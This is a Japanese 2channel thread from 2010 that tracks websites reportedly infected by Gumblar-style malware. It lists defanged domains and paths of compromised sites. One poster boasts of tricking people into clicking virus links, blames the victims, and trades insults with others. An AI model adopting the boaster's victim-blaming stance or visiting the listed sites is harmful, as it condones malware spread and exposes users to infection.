2010/05/20(木) 21:10:49転んでも泣かない。。。( ̄ー ̄)ニヤリッ
0898名無しさん@お腹いっぱい。
2010/05/20(木) 21:28:340899名無しさん@お腹いっぱい。
2010/05/20(木) 22:03:12■警視庁匿名通報フォーム(通報は2chのように書き込むだけ)
http://www.keishicho.metro.tokyo.jp/anket/other.htm
■全国ハイテク警察リンク集 http://www002.upp.so-net.ne.jp/dalk/ksatulink.html
■警視庁ホームページ http://www.keishicho.metro.tokyo.jp/
■警察総合相談電話番号 http://www.npa.go.jp/safetylife/soudan/madoguchi.htm
(携帯電話・PHSからは全国共通#9110 緊急性を要するものは110)
■公安調査庁 http://www.moj.go.jp/KOUAN/
■国家公安委員会 http://www.npsc.go.jp/
■国際刑事警察機構(ICPO) http://www.interpol.int/
■国防省(アメリカ) http://www.defenselink.mil/
交番勤務の巡査じゃわからないかもしれないから
普通に被害に遭うかあいかけたなら
自分の近くの警察署か道府県警察か警視庁でいい
広域犯罪なら警視庁とか管轄外に通報しても
受け付けてくれると言えば受け付けてくれると思う
0900名無しさん@お腹いっぱい。
2010/05/20(木) 22:22:29そのコピペ探してたんだ
サンクス
0901(VдV) ◆yUyb3Tqn92
2010/05/21(金) 08:27:41いつの話ししてるんだお前
とっくに移転したぜ。
今は隠れサイトとしてやってるけど
最近あんま更新してない
>>891
そういう発想貧困なレスされてもなァ
せめてネット牛若丸とか捻ったこと言えるようになろうぜ凡人(>w<)
0902(VдV) ◆yUyb3Tqn92
2010/05/21(金) 08:29:53(VдV)通報ネタももう見飽きてるお
通報通報と言ってるのは、所詮、俺様にウィルス踏まされた奴の負け犬の遠吠え┐(VДV)┌ =3
もうかれこれ3年以上も前からゲーム感覚でウィルスURL踏ませてるが
見ての通りヽ(VдV)ノぴんぴんしてるおWWW
その時点で気づけよ馬鹿ども
俺様の完全勝利だということにね(VдV)v
0903名無しさん@お腹いっぱい。
2010/05/21(金) 08:50:46オマエもツメが甘いなぁ
捕まってから泣かないように。
0904(VдV) ◆yUyb3Tqn92
2010/05/21(金) 09:15:23それって全然、反論にすらなってないぜ?
どこがどう詰めが甘いのか説明できてない時点で不合格(>w<)
捕まってから・・・とか君の願望を言われても負け惜しみにしか聞こえないお(>w<)
だってさあ〜♪いくら吠えたところでもうわかるでしょ?WWW
見ての通り俺様ぴんぴんしてるしヽ(VдV)ノ調子に乗り乗りなので〜♪
じゃあもう一回言うぞ?Wこれで止め刺すぞWWWW
俺様がぴんぴんしてる時点で気づけよ低脳WWW
v(VДV)俺様の完全勝利だということにね(VДV)v
0905名無しさん@お腹いっぱい。
2010/05/21(金) 09:27:28どちらにしてもウザコテの煽りをスルーできなかった>>903の負けでOK
てかスレチ杉、周りの迷惑考えろks
0906名無しさん@お腹いっぱい。
2010/05/21(金) 10:05:29自演か
お前のことを擁護するような間抜けはここにはおらん
>>904
顔文字の力借りなきゃやってられないような馬鹿はすっこんでろ
今年幾つだ?中年
0907名無しさん@お腹いっぱい。
2010/05/21(金) 10:26:520908名無しさん@お腹いっぱい。
2010/05/21(金) 10:37:22>>889
いつの話ししてるんだお前
とっくに移転したぜ。
今は隠れサイトとしてやってるけど
最近あんま更新してない
>>891
そういう発想貧困なレスされてもなァ
せめてネット牛若丸とか捻ったこと言えるようになろうぜ凡人
902 :◆yUyb3Tqn92 :2010/05/21(金) 08:29:53
更に俺様のターン
通報ネタももう見飽きてるお
通報通報と言ってるのは、所詮、俺様にウィルス踏まされた奴の負け犬の遠吠え
もうかれこれ3年以上も前からゲーム感覚でウィルスURL踏ませてるが
見ての通りぴんぴんしてるお
その時点で気づけよ馬鹿ども
俺様の完全勝利だということにね
904 :◆yUyb3Tqn92 :2010/05/21(金) 09:15:23
>>903
それって全然、反論にすらなってないぜ?
どこがどう詰めが甘いのか説明できてない時点で不合格
捕まってから・・・とか君の願望を言われても負け惜しみにしか聞こえないお
だってさあ〜いくら吠えたところでもうわかるでしょ?
見ての通り俺様ぴんぴんしてるし調子に乗り乗りなので
じゃあもう一回言うぞ?これで止め刺すぞ
俺様がぴんぴんしてる時点で気づけよ低脳
俺様の完全勝利だということにね
0909名無しさん@お腹いっぱい。
2010/05/21(金) 11:50:51削除依頼を出してください
代行を使ってもかまいません
★整理削除依頼 代行依頼スレ★64
http://jfk.2ch.net/test/read.cgi/nanmin/1263120272/
エロ画像が規制になるように目に余るようなら削除人が規制議論に持って行ってくれるかもしれない
0910名無しさん@お腹いっぱい。
2010/05/21(金) 11:52:08通常に戻せ
0911名無しさん@お腹いっぱい。
2010/05/21(金) 12:33:590912名無しさん@お腹いっぱい。
2010/05/21(金) 13:54:33oc-akademy●com/taiken/1niti-3.html
topページは何とも無かったが…
0913名無しさん@お腹いっぱい。
2010/05/21(金) 14:12:39404
0914名無しさん@お腹いっぱい。
2010/05/21(金) 14:18:31academyだよね
taiken/wind.js
0915名無しさん@お腹いっぱい。
2010/05/21(金) 14:28:04手打ちしたから間違えてた
>>914
があってる
0916名無しさん@お腹いっぱい。
2010/05/21(金) 15:24:26www●pommerland-herb●com
またろりぽのサーバなわけだが…
0917名無しさん@お腹いっぱい。
2010/05/21(金) 18:07:16スペックの高いマシンだと重くなるとも思えないし
0918名無しさん@お腹いっぱい。
2010/05/21(金) 18:11:09スキャンすればだいたいおk
0919名無しさん@お腹いっぱい。
2010/05/21(金) 19:44:05ダウンローダーがアンチウィルスに引っかかる
0920名無しさん@お腹いっぱい。
2010/05/21(金) 21:26:110921名無しさん@お腹いっぱい。
2010/05/21(金) 21:52:490922名無しさん@お腹いっぱい。
2010/05/21(金) 21:54:470923名無しさん@お腹いっぱい。
2010/05/21(金) 22:13:30まさかこのスレを開いただけで感染するなんてことは無いよな
0924名無しさん@お腹いっぱい。
2010/05/21(金) 22:16:580925名無しさん@お腹いっぱい。
2010/05/21(金) 22:30:28お前にはここがお似合いだ
http://pc11.2ch.net/pcqa/
0926名無しさん@お腹いっぱい。
2010/05/21(金) 22:30:43http://mimizun.com/log/2ch/news/1272270703/324
http://mimizun.com/log/2ch/news/1272271109/258
http://hissi.org/read.php/news/20100427/V2dmT3Y4RkQ.html
http://hissi.org/read.php/news/20100427/RG04ODN6Wks.html
http://hissi.org/read.php/news/20100402/Z3JMSVFZZ2w.html
http://mimizun.com/log/2ch/news/1270234103/286
http://hissi.org/read.php/news/20100403/ME9Jbmk1cHg.html
http://hissi.org/read.php/news/20100404/OGNFNTIrQlc.html
http://mimizun.com/log/2ch/news/1270379088/51
http://hissi.org/read.php/news/20100405/b0g1eHZxbzE.html
http://mimizun.com/log/2ch/news/1272180292/308
http://mimizun.com/log/2ch/news/1273571993/728-742
0927名無しさん@お腹いっぱい。
2010/05/21(金) 22:56:32まとめて報告すればおk
0928名無しさん@お腹いっぱい。
2010/05/22(土) 13:09:120929名無しさん@お腹いっぱい。
2010/05/22(土) 16:07:12www●mika-nakashima●com ←途中で切れている
nakaya-world●com/modules/bulletin
www●brand-crea●com/blog/cat15/cat32
0930名無しさん@お腹いっぱい。
2010/05/22(土) 16:19:450931名無しさん@お腹いっぱい。
2010/05/22(土) 16:25:380932名無しさん@お腹いっぱい。
2010/05/22(土) 20:49:36http://pc11.2ch.net/test/read.cgi/sec/1266748206/756
404ページなんだけど404のbody前になにやら入っちゃってる
www●hokutendo●com/favicon●ico
リンク先.phpはもう無い模様
gredもaguseも404だとそれ以上見に行かないっぽいな
0933名無しさん@お腹いっぱい。
2010/05/22(土) 20:55:26こっち来んなw
0934名無しさん@お腹いっぱい。
2010/05/23(日) 00:06:27ガンブラー:大阪市の外郭団体サイトが感染 /大阪
ttp://headlines.yahoo.co.jp/hl?a=20100520-00000114-mailo-l27
0935名無しさん@お腹いっぱい。
2010/05/23(日) 13:42:57ラブドールのサイト。
他にラブドールメーカーの国内サイト16ほど見たけど、そっちは大丈夫みたい。
0936名無しさん@お腹いっぱい。
2010/05/23(日) 13:52:160937名無しさん@お腹いっぱい。
2010/05/23(日) 15:26:57-糸冬-
0938名無しさん@お腹いっぱい。
2010/05/23(日) 15:49:590939名無しさん@お腹いっぱい。
2010/05/23(日) 16:02:510940名無しさん@お腹いっぱい。
2010/05/23(日) 16:08:210941名無しさん@お腹いっぱい。
2010/05/23(日) 16:10:410942名無しさん@お腹いっぱい。
2010/05/23(日) 16:39:43www●ikkaan●com
oceanplace●jp
fantastic-contact●com/ad/9/9/
junkmaria●web●fc2●com
atakizawa●com/at/5/4/index●html
0943名無しさん@お腹いっぱい。
2010/05/23(日) 19:00:430944名無しさん@お腹いっぱい。
2010/05/23(日) 19:42:220945名無しさん@お腹いっぱい。
2010/05/23(日) 20:04:20真面目でもバカじゃ意味ない
0946名無しさん@お腹いっぱい。
2010/05/23(日) 20:38:28管理者が馬鹿ではどうしようもない
どんなサイトだろうがまともな奴が管理人ならそれなりに安心できる
0947名無しさん@お腹いっぱい。
2010/05/23(日) 23:33:500948名無しさん@お腹いっぱい。
2010/05/24(月) 00:44:100949名無しさん@お腹いっぱい。
2010/05/24(月) 00:45:50DELL もうちょっとどうにかなれば最強なのに
GENO 最強の選択、最高のアワード! 世界が賞賛する比類なきコストパフォーマンス!
0950名無しさん@お腹いっぱい。
2010/05/24(月) 01:10:410951名無しさん@お腹いっぱい。
2010/05/24(月) 01:21:210952名無しさん@お腹いっぱい。
2010/05/24(月) 05:43:310953名無しさん@お腹いっぱい。
2010/05/24(月) 06:11:240954(VдV) ◆yUyb3Tqn92
2010/05/24(月) 06:58:09先週、書き込みしたときのにまだレス付いてたのかお?
俺様に発想力についての指摘をされたことがよほど頭にきたと見える
うむ、悔しそうでなによりだ(>w<)やりぃ!
まぁ限がないので、勝者からの止めの言葉としては
(VдV)ざまぁ死ね
と、だけ言っておく。
とても冷めたクールな口調のセリフとして読もうな(Vд^)−☆やりぃ!
0955名無しさん@お腹いっぱい。
2010/05/24(月) 06:59:49で、総務大臣が使ってたのブラウザがIE6な件www
お頭がこんなことではもうオワタorz
0956名無しさん@お腹いっぱい。
2010/05/24(月) 07:03:540957名無しさん@お腹いっぱい。
2010/05/24(月) 07:06:12(VдV) ◆yUyb3Tqn92←みたいな池沼がここでURL仕入れてその辺に貼ってる事実から目を逸らすなよ
悪いのは貼る奴とURL提供してるお前らな
両方とも責任とって首連れよksども
0958名無しさん@お腹いっぱい。
2010/05/24(月) 07:07:17ウイルス作った奴も当然悪い
どっかの国みたく作った死刑にすればいい
0959(VдV) ◆yUyb3Tqn92
2010/05/24(月) 07:24:39やあ、おはよう。てか久しぶり。
お前、前に俺様にウィルス踏まされて以来、俺様が降臨するスレに沸く奴だろう。
いつものキーワードでわかった。
それはそうと
お前が今書いたことは俺様じゃなくても馬鹿にされる内容だぜ
せめてもの情けとして、他の奴がお前を馬鹿にする前に俺様がお前を馬鹿にしてあげる
>悪いのは貼る奴とURL提供してるお前らな ←×
(VдV)悪いのは100%踏む奴
俺様がURL貼るのは殆んど2ch。
2chなんかで貼られたURLを馬鹿みたいにそのままクリックする奴が低脳で悪い
てかまさに俺様にウィルス踏まされた今のお前のこと(>w<)
>どっかの国みたく作った死刑にすればいい
どっか(笑)の国じゃなくて、ちゃんとどこの国かググってから書こうな(>w<)じゃなきゃミーハーだぜ
>ウイルス作った奴も当然悪い
(VдV)むしろ良いか悪いかで分けようと必死になってる幼稚な発想のお前が一番悪い
(VдV)以上
顔文字様による正論コーナーでした。
0960(VдV) ◆yUyb3Tqn92
2010/05/24(月) 07:26:51ご意見やご感想がある方はこちらから(Vд^)−☆
http://www.google.co.jp/search?hl=&q=%EF%BC%88%EF%BC%87%D0%B4%EF%BC%87%EF%BC%89%E3%81%AE%E4%BF%BA%E6%A7%98%E3%83%96%E3%83%AD%E3%82%B0&sourceid=navclient-ff&rlz=1B3DVFA_ja___JP330&ie=UTF-8
実はグーグルにもインデックスされてます('д')v
0961名無しさん@お腹いっぱい。
2010/05/24(月) 07:31:46わかるようにわざと入れてんだよbk!
お前踏むほうが悪いとか前から言ってるけど本気だとしたら終わってるぞwwwwじゃあ殺される方が悪いのかよ?
この糞スレの住人だって踏む奴が悪いなんて開き直りみたいなこと言わんぞ?言ったとしたらお前の以遠確定なwwww
0962名無しさん@お腹いっぱい。
2010/05/24(月) 07:33:02ウイルス乙
誰もふまねーよwww
0963(VдV) ◆yUyb3Tqn92
2010/05/24(月) 07:38:55ご意見・ご感想は
つ>>960
君があせって「以遠確定」とか(笑)書いてしまったことの反省文も待ってるお☆
0964名無しさん@お腹いっぱい。
2010/05/24(月) 07:47:52URLからしてグーグル装った偽サイトとかだろwwwバレてますからどんまい!w
0965名無しさん@お腹いっぱい。
2010/05/24(月) 08:12:04未成年なのか知らんけど、もっと知識つけてからネットしようよ
スレタイも見てくれ
0966名無しさん@お腹いっぱい。
2010/05/24(月) 08:15:35>>964からしてバカさ加減が溢れ出ている
0967名無しさん@お腹いっぱい。
2010/05/24(月) 08:30:35さすがに踏む奴が100%悪いって考えには同意しかねるが
今沸いてるようなガキには良い薬になるかもな
0968名無しさん@お腹いっぱい。
2010/05/24(月) 08:35:12は?
0969名無しさん@お腹いっぱい。
2010/05/24(月) 08:42:210970名無しさん@お腹いっぱい。
2010/05/24(月) 11:39:42http://blog-imgs-29-origin.fc2.com/c/h/e/chelsea2ki/2009_07_14_02.jpg
0971名無しさん@お腹いっぱい。
2010/05/24(月) 12:04:15おw
先週、書き込みしたときのにまだレス付いてたのかお?
俺様に発想力についての指摘をされたことがよほど頭にきたと見える
うむ、悔しそうでなによりだやりぃ!
まぁ限がないので、勝者からの止めの言葉としては
ざまぁ死ね
と、だけ言っておく。
とても冷めたクールな口調のセリフとして読もうなやりぃ!
959 : ◆yUyb3Tqn92 :2010/05/24(月) 07:24:39
>>957-958
やあ、おはよう。てか久しぶり。
お前、前に俺様にウィルス踏まされて以来、俺様が降臨するスレに沸く奴だろう。
いつものキーワードでわかった。
それはそうと
お前が今書いたことは俺様じゃなくても馬鹿にされる内容だぜ
せめてもの情けとして、他の奴がお前を馬鹿にする前に俺様がお前を馬鹿にしてあげる
0972名無しさん@お腹いっぱい。
2010/05/24(月) 12:05:08悪いのは100%踏む奴
俺様がURL貼るのは殆んど2ch。
2chなんかで貼られたURLを馬鹿みたいにそのままクリックする奴が低脳で悪い
てかまさに俺様にウィルス踏まされた今のお前のこと
>どっかの国みたく作った死刑にすればいい
どっか(笑)の国じゃなくて、ちゃんとどこの国かググってから書こうなじゃなきゃミーハーだぜ
>ウイルス作った奴も当然悪い
むしろ良いか悪いかで分けようと必死になってる幼稚な発想のお前が一番悪い
以上
顔文字様による正論コーナーでした。
960 : ◆yUyb3Tqn92 :2010/05/24(月) 07:26:51
顔文字の正論コーナーについて
ご意見やご感想がある方はこちらから
http://www.google.co.jp/search?hl=&q=%EF%BC%88%EF%BC%87%D0%B4%EF%BC%87%EF%BC%89%E3%81%AE%E4%BF%BA%E6%A7%98%E3%83%96%E3%83%AD%E3%82%B0&sourceid=navclient-ff&rlz=1B3DVFA_ja___JP330&ie=UTF-8
実はグーグルにもインデックスされてます
963 : ◆yUyb3Tqn92 :2010/05/24(月) 07:38:55
>>961
ご意見・ご感想は
つ>>960
君があせって「以遠確定」とか(笑)書いてしまったことの反省文も待ってるお
0973名無しさん@お腹いっぱい。
2010/05/24(月) 12:23:45スレをずっと見てきてる人間はわかるよ
書き込み時間帯、レス反応の短さ、内容
こんなものを自演するために人生の時間使ったわけ?
0974名無しさん@お腹いっぱい。
2010/05/24(月) 12:31:36これはクソコテに粘着してる名無しの方が痛すぎる
未成年なのか知らんけど、もっと知識つけてからネットしようよ
スレタイも見てくれ
966 :名無しさん@お腹いっぱい。:2010/05/24(月) 08:15:35
未成年だろ
>>964からしてバカさ加減が溢れ出ている
967 :名無しさん@お腹いっぱい。:2010/05/24(月) 08:30:35
>>959は確かに正論
さすがに踏む奴が100%悪いって考えには同意しかねるが
今沸いてるようなガキには良い薬になるかもな
0975名無しさん@お腹いっぱい。
2010/05/24(月) 12:34:56お前はどうしてそんなどうでもいいコピペのために人生の時間使っちゃってるの?w
お前が例のコテにぼろ糞言われてたガキだということは誰の目から見ても明らかだw
そうやって必死になるからコテの玩具にされるんだよ
0976名無しさん@お腹いっぱい。
2010/05/24(月) 12:36:27>>959は確かに正論
さすがに踏む奴が100%悪いって考えには同意しかねるが
今沸いてるようなガキには良い薬になるかもな
905 :名無しさん@お腹いっぱい。:2010/05 /21(金) 09:27:28
ウザコテだが何気に言ってることは正論なので困る
どちらにしてもウザコテの煽りをスルーできなかった>>903の負けでOK
てかスレチ杉、周りの迷惑考えろks
0977名無しさん@お腹いっぱい。
2010/05/24(月) 12:41:32このコテハンの書き込みをコピペしてるコピペ厨(>>971-973,>>976)はずっとそのコテハンに粘着してるってことか
コテの相手するだけでも無駄なのにコピペで粘着するとか、そっちの方が人生の無駄遣いってことでFAだろwww
0978名無しさん@お腹いっぱい。
2010/05/24(月) 12:44:00>>971-973
お前はどうしてそんなどうでもいいコピペのために人生の時間使っちゃってるの?w
お前が例のコテにぼろ糞言われてたガキだということは誰の目から見ても明らかだw
そうやって必死になるからコテの玩具にされるんだよ
0979名無しさん@お腹いっぱい。
2010/05/24(月) 12:47:510980名無しさん@お腹いっぱい。
2010/05/24(月) 12:50:37だからコピペしてるのはさっき顔文字にウイルス踏まされたのをこのスレのせいにしてたガキだろ
それがまだスレでふぁびょってるだけだから、ほっとけば疲れて消えるだけw
0981名無しさん@お腹いっぱい。
2010/05/24(月) 13:02:16それらが一人のかきこみである可能性 ≦ >>977>>974が(VдV) ◆yUyb3Tqn92のかきこみである可能性 = その>>977と会話する>>980がまた自演である可能性w
0982名無しさん@お腹いっぱい。
2010/05/24(月) 13:06:46セキュの掲示板だぜ?
ちょっとした亜種くらいじゃ踏んでも感染しないだろ?
もし感染するような新種ならば
URLを貼った奴かて感染してる可能性が高いと思うがね
そのことに本人が知らなかっただけじゃねぇの?
単なる逆恨みのために拡散しただけじゃねぇの?くだらねぇ…
0983名無しさん@お腹いっぱい。
2010/05/24(月) 13:07:05お前の頭の中が(VдV)のことでいっぱいなのはわかった
コテハン相手にそこまで必死になってる時点でコテハンの思い通り
0984名無しさん@お腹いっぱい。
2010/05/24(月) 13:08:550985名無しさん@お腹いっぱい。
2010/05/24(月) 13:09:400986名無しさん@お腹いっぱい。
2010/05/24(月) 13:12:47このスレにいる奴がみんなこの板の住人と思ってるのかよww
(VдV) ◆yUyb3Tqn92にウイルス踏まされた情弱がこのスレに泣きついてる状況でなにを言ってるんだ・・・
そうじゃなくても普段から質問スレと勘違いしてくる奴が多いだろう
0987名無しさん@お腹いっぱい。
2010/05/24(月) 13:16:250988名無しさん@お腹いっぱい。
2010/05/24(月) 13:19:130989名無しさん@お腹いっぱい。
2010/05/24(月) 13:20:05落ち着け
日本語でおk
0990名無しさん@お腹いっぱい。
2010/05/24(月) 13:22:55は?
0991名無しさん@お腹いっぱい。
2010/05/24(月) 13:23:43そこはタイプミスしたら駄目だろ
本人がいたらまたぼろ糞に指摘されてたとこだぞwww
0992名無しさん@お腹いっぱい。
2010/05/24(月) 13:25:020993名無しさん@お腹いっぱい。
2010/05/24(月) 13:25:480994名無しさん@お腹いっぱい。
2010/05/24(月) 13:25:55まずはあんなコテハンにウイルスを引っ掛けられた自分の無能さを恨みなさいw
0995名無しさん@お腹いっぱい。
2010/05/24(月) 13:26:480996名無しさん@お腹いっぱい。
2010/05/24(月) 13:30:140997名無しさん@お腹いっぱい。
2010/05/24(月) 13:30:420998名無しさん@お腹いっぱい。
2010/05/24(月) 13:31:500999名無しさん@お腹いっぱい。
2010/05/24(月) 13:32:571000名無しさん@お腹いっぱい。
2010/05/24(月) 13:33:02>>999は苦しみながら悔しい思いをしながら死亡
更にそれ以外の弱者も普通に死亡
10011001
Over 1000Threadもう書けないので、新しいスレッドを立ててくださいです。。。
レス数が1000を超えています。これ以上書き込みはできません。